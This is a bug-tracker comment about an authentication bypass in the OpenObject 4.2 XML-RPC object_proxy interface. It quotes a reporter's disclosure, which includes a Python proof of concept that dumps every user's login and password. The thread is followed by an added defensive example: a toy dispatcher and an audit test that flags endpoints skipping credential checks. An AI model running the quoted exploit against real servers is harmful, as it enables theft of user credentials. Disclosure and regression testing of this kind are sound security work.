Comment 6 for bug 452373

Nhomar - Vauxoo (nhomar) wrote : Re: [Bug 452373] Re: [4.2] Netsvc object_proxy bypass

I tried to use this and I cannot replicate this bug; can you guide me
please!

2010/4/26 Eduard Carreras i Nadal <email address hidden>

> Today, 4 months after, the vulnerability is still there...
>
> I re-attach the exploit...
>
> ** Attachment added: "get_all_users_pass.py"
> http://launchpadlibrarian.net/45524184/get_all_users_pass.py
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
> You received this bug notification because you are subscribed to
> OpenObject.
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of the object XML-RPC interface using another
> interface called object_proxy. The only requisite is that the server is
> initialized (e.g. someone does the login or tries to log in).
>
> This is solved in 5.0 but not in 4.2.
> In Bazaar, 4.2 is tagged as mature and I can't understand why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use in our production servers, some of
> which are still running on the 4.2 version.
>
> Proof of concept:
>
> import xmlrpclib
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login', 'password'])
> for u in f:
>     print ' user: %s pass: %s' % (u['login'], u['password'])
>

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>
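An added example, not code from this thread or from OpenObject, modelling the bug class Eduard describes: two XML-RPC endpoints reach the same object methods, but only one of them validates the caller's credentials. The toy dispatcher, the user table and the `audit_unauthenticated_access` check are hypothetical stand-ins; the audit is the regression test a maintainer would want so that every exposed path (`object` and `object_proxy` alike) refuses an `execute` call that carries bad credentials.

```python
import xmlrpc.client
from xmlrpc.server import SimpleXMLRPCDispatcher

# Constructed sample user table; the password is a placeholder, not a real one.
USERS = {1: {"login": "admin", "password": "admin-placeholder"}}

def _check_login(db, uid, passwd):
    return uid in USERS and USERS[uid]["password"] == passwd

def _model_call(model, method, *args):
    """Stand-in for the object layer: only res.users.read is modelled."""
    if (model, method) == ("res.users", "read"):
        ids, fields = args
        return [{f: USERS[i][f] for f in fields} for i in ids if i in USERS]
    raise xmlrpc.client.Fault(2, "unknown model/method")

def make_endpoint(require_auth):
    """Dispatcher exposing execute(); with require_auth=False it never checks
    passwd, which is the object_proxy bug class described in the thread."""
    disp = SimpleXMLRPCDispatcher(allow_none=True)
    def execute(db, uid, passwd, model, method, *args):
        if require_auth and not _check_login(db, uid, passwd):
            raise xmlrpc.client.Fault(1, "AccessDenied")
        return _model_call(model, method, *args)
    disp.register_function(execute, "execute")
    return disp

def call(endpoint, method, *params):
    """Marshal a request, run it through the dispatcher in-process, unmarshal."""
    request = xmlrpc.client.dumps(params, methodname=method, allow_none=True)
    reply = endpoint._marshaled_dispatch(request.encode())
    try:
        (value,), _ = xmlrpc.client.loads(reply)
        return value
    except xmlrpc.client.Fault as fault:
        return fault  # the caller inspects the Fault instead of raising

def audit_unauthenticated_access(endpoints):
    """Names of endpoints that serve res.users data to a caller with a wrong
    password; an empty list means every exposed path enforces authentication."""
    leaky = []
    for name, endpoint in endpoints.items():
        result = call(endpoint, "execute", "terp", 1, "wrong", "res.users", "read", [1], ["login"])
        if not isinstance(result, xmlrpc.client.Fault):
            leaky.append(name)
    return leaky

# Pre-fix layout: object checks credentials, object_proxy does not.
LEGACY = {"object": make_endpoint(True), "object_proxy": make_endpoint(False)}
# Fixed layout: both paths go through the same credential check.
FIXED = {"object": make_endpoint(True), "object_proxy": make_endpoint(True)}
```

Running the audit against the pre-fix layout names `object_proxy` as the path that answers without valid credentials; against the fixed layout it returns an empty list.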